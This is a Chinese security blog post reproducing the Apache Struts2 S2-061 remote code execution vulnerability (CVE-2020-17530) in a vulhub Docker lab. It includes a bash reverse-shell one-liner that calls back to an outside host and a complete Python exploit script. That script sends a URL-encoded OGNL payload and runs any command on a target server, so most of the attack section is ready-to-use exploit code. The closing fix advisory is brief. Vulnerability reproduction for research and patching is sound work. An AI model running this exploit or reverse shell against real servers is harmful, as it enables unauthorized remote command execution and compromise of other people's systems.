Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现以及脚本编写

admin 2022年1月6日01:07:46安全博客评论30 views2415字阅读8分3秒阅读模式

漏洞介绍

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞,开发人员使用了 %{…} 语法,从而攻击者可以通过构Payload,从而造成远程代码执行。

影响版本

Apache Struts2:2.0.0 - 2.5.25

漏洞复现

1
2
3
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

docker-compose up -d

查看端口

1
2
3
╰─$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
e60ea5e361ff vulhub/struts2:2.5.25 "/usr/local/bin/mvn-…" 34 minutes ago Up 34 minutes 0.0.0.0:8080->8080/tcp s2-061_struts2_1

访问漏洞环境

image-20201216194045330

测试漏洞是否存在

image-20201216194318514

直接执行命令

image-20201216201525731

反弹shell

通过在线地址将bash反弹命令进行进行编码转换

http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/ip/port 0>&1

image-20201216210508614

image-20201216205907765

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# encoding=utf-8
import requests
import sys
from lxml import etree


def exp(url,cmd):
payload="%25%7b(%27ol4three%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27"+cmd+"%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"
tturl=url+"/?id="+payload
r=requests.get(tturl)
page=r.text
# etree=html.etree
page=etree.HTML(page)
data = page.xpath('//a[@id]/@id')
print(data[0])

if __name__=='__main__':
print('+------------------------------------------------------------+')
print('+ EXP: python struts2-061-poc.py http://1.1.1.1:8081 id +')
print('+ VER: Struts 2.0.0-2.5.25 +')
print('+------------------------------------------------------------+')
print('+ S2-061 RCE && CVE-2020-17530 +')
print('+------------------------------------------------------------+')
if len(sys.argv)!=3:
print("[+]ussage: http://ip:port command")
print("[+]============================================================")
sys.exit()
url=sys.argv[1]
cmd=sys.argv[2]
exp(url,cmd)

验证

image-20201216203912346

Goby poc 开发界面

image-20201216204623455

image-20201216205437353

image-20201216205455850

单个漏洞验证

image-20201216205525154

修复意见

将Apache Struts框架升级至最新版本

https://cwiki.apache.org/confluence/display/WW/S2-061

参考链接

https://mp.weixin.qq.com/s/rcfXIBSpNtgCFua0yUK_ew

FROM :ol4three.com | Author:ol4three

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:07:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现以及脚本编写 http://cn-sec.com/archives/721084.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: